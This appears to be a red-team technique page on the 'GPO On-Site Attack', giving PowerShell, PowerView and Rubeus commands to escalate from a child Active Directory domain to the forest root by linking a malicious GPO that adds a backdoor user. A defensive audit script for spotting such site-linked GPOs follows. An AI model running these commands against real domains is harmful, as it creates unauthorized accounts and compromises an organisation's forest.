GPO On-Site Attack
This technique can be used to move from the child domain to the parent one. The steps are the following:

1. Create a malicious GPO on the Child DC.
2. Query the Root Domain to identify the replication site of the Root Domain.
3. Link the created GPO to the Default Replication Site of the Root DC as SYSTEM.
4. Upon completion of replication, confirm the presence of the created GPO within the Root DC.
We'll start by creating a GPO:

```powershell
$gpo = "Something"
New-GPO $gpo
```

With that set up we'll create a scheduled task inside that GPO that will add a new user:
```powershell
Import-Module .\PowerView_2.ps1
New-GPOImmediateTask -Verbose -Force -TaskName 'Something' -GPODisplayName "Something" -Command C:\Windows\System32\cmd.exe -CommandArguments "/c net user otter SomethingSecure123! /add"
```

We can verify that the task has been added; we also have to make sure the "Run a new instance in parallel" option is set.
After this, it's time to link the GPO to the Default Replication Site of the Root DC. To do this we first have to retrieve the site:

```powershell
Get-ADDomainController -Server domain.com | Select ServerObjectDN
```

and then link the GPO to it from a SYSTEM shell:

```powershell
$sitePath = "CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=DOMAIN,DC=COM"
New-GPLink -Name "Something" -Target $sitePath -Server dev.domain.com
```

Now we can wait for the task to run and request a TGT for the backdoored user on the parent DC:
```powershell
.\Rubeus.exe asktgt /user:otter /password:'SomethingSecure123!' /domain:domain.com /ptt
```
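A defender-side check for the footprint this technique leaves, added here as an example and not part of the original page: it reads the gPLink attribute of every site object in the forest-wide Configuration partition and flags any link whose GPO is owned by a domain other than the forest root (a child-domain GPO linked to a site is exactly what the steps above produce). Cmdlets come from the RSAT ActiveDirectory module; the function name Get-SiteLinkedGpo is our own.

```powershell
# Added example: audit site-linked GPOs across the forest.
# Assumes the ActiveDirectory module and a domain-joined reader account.
Import-Module ActiveDirectory

function Get-SiteLinkedGpo {
    $configNc   = (Get-ADRootDSE).configurationNamingContext
    $forestRoot = (Get-ADForest).RootDomain

    # Sites live in the Configuration partition, so a GPO linked here applies
    # to every DC of every domain that sits in that site, across domain boundaries.
    $sites = Get-ADObject -SearchBase "CN=Sites,$configNc" `
                          -LDAPFilter "(objectClass=site)" `
                          -Properties gPLink

    foreach ($site in $sites) {
        if (-not $site.gPLink) { continue }
        # gPLink format: [LDAP://cn={GUID},cn=policies,cn=system,DC=x,DC=y;<options>]
        $links = [regex]::Matches($site.gPLink, '\[LDAP://([^;]+);(\d+)\]')
        foreach ($link in $links) {
            $gpoDn   = $link.Groups[1].Value
            $options = [int]$link.Groups[2].Value
            # Rebuild the DNS name of the domain that owns the GPO object from its DC= parts.
            $dcParts   = $gpoDn -split ',' | Where-Object { $_ -match '^DC=' }
            $gpoDomain = ($dcParts -replace '^DC=', '') -join '.'
            # Resolve the GPO in its home domain; a dangling link is itself worth a look.
            $gpo = Get-ADObject -Identity $gpoDn -Server $gpoDomain `
                                -Properties displayName, whenCreated -ErrorAction SilentlyContinue
            [pscustomobject]@{
                Site       = $site.Name
                GpoDomain  = $gpoDomain
                GpoName    = if ($gpo) { $gpo.displayName } else { '<unresolvable>' }
                Created    = if ($gpo) { $gpo.whenCreated } else { $null }
                Disabled   = ($options -band 1) -ne 0   # bit 0: link disabled
                Enforced   = ($options -band 2) -ne 0   # bit 1: link enforced
                # Site links should normally reference root-domain GPOs only.
                Suspicious = ($gpoDomain -ne $forestRoot)
            }
        }
    }
}

Get-SiteLinkedGpo | Sort-Object Suspicious -Descending | Format-Table -AutoSize
```

This is a point-in-time snapshot; with "Audit Directory Service Changes" enabled and a SACL on the Sites container, a write to a site's gPLink attribute also produces Security event 5136, which gives the same signal in near real time.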